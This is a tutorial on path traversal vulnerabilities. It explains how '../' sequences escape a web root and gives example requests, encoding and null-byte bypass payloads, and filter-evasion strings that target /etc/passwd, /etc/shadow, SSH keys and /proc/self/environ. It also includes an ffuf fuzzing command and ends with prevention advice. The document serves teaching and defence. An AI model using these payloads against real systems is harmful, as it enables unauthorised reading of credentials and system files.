Path Traversal: Escaping the Web Root
Understanding and exploiting directory traversal vulnerabilities
What is Path Traversal?
Path Traversal (also called Directory Traversal) is a web security vulnerability that allows attackers to read arbitrary files on the server by manipulating file paths with “../” sequences and similar constructs.
Normal File Access
Legitimate request for an image:
GET /images/profile.jpg HTTP/1.1
Path Traversal Attack
Malicious request to access sensitive files:
GET /images/../../../../etc/passwd HTTP/1.1
How Path Traversal Works
Web servers typically restrict users to a specific “web root” directory. However, if input isn’t validated, attackers can “climb up” the directory tree using dot-dot-slash (../).
Common Vulnerable Scenarios
1. File Download Functionality
https://example.com/download?file=../../../../etc/passwd
2. Image Loading
https://example.com/loadImage?img=../../../.ssh/id_rsa
3. Template Inclusion
https://example.com/render?template=../../../../proc/self/environ
Path Traversal Techniques
| Technique | Example | Purpose |
|---|---|---|
| Basic traversal | ../../etc/passwd |
Standard path traversal |
| URL encoding | ..%2F..%2Fetc%2Fpasswd |
Bypass simple filters |
| Double encoding | ..%252F..%252Fetc%252Fpasswd |
Bypass multiple decoding layers |
| Null byte | ../../etc/passwd%00 |
Terminate string after payload (Legacy) |
| Absolute path | /etc/passwd |
Direct file reference |
Testing for Path Traversal
1. Manual Testing
- Identify file parameters (file, path, doc, etc.)
- Try basic traversal sequences
- Experiment with different encodings
- Test for file existence
2. Common Files to Check
/etc/passwd /etc/shadow /proc/self/environ /var/log/apache2/access.log C:\Windows\System32\drivers\etc\hosts
3. Automated Tools
# Using Burp Suite 1. Spider the application 2. Find file parameters 3. Use Intruder with traversal payloads # Using ffuf ffuf -u "https://example.com/download?file=FUZZ" -w traversal.txt
Bypassing Defenses
1. Path Normalization Bypass
....// ....\/ ..\/.. %2e%2e%2f .%2e/%2e%2e/%2f
2. Starting Directory Bypass
When restricted to a specific directory:
/var/www/html/uploads/../../../etc/passwd uploads/../../../../etc/passwd
3. File Extension Bypass
When required extensions are enforced:
../../etc/passwd%00.jpg ../../etc/passwd?.jpg ../../etc/passwd%23.jpg
Real-World Examples
Case 1: Web Server Configuration
A CMS plugin allowed file downloads via a parameter vulnerable to traversal, exposing server credentials.
Case 2: Image Processing Service
An image resizing service didn’t validate input paths, allowing access to AWS credentials.
Case 3: Log Viewer Application
A web-based log viewer accepted arbitrary paths, exposing sensitive system files.
Prevention and Mitigation
1. Input Validation
- Whitelist allowed characters (e.g., alphanumeric only)
- Reject paths containing “../”
- Canonicalize paths before validation
2. Secure File Operations
- Use index-based file access (ID maps to file) instead of direct paths
- Prepend a base directory to all paths and check if it resolves within that directory
- Use chroot jails for sensitive operations
Conclusion
Path Traversal remains a critical vulnerability because it’s often easy to exploit and the impact can range from information disclosure to full system compromise.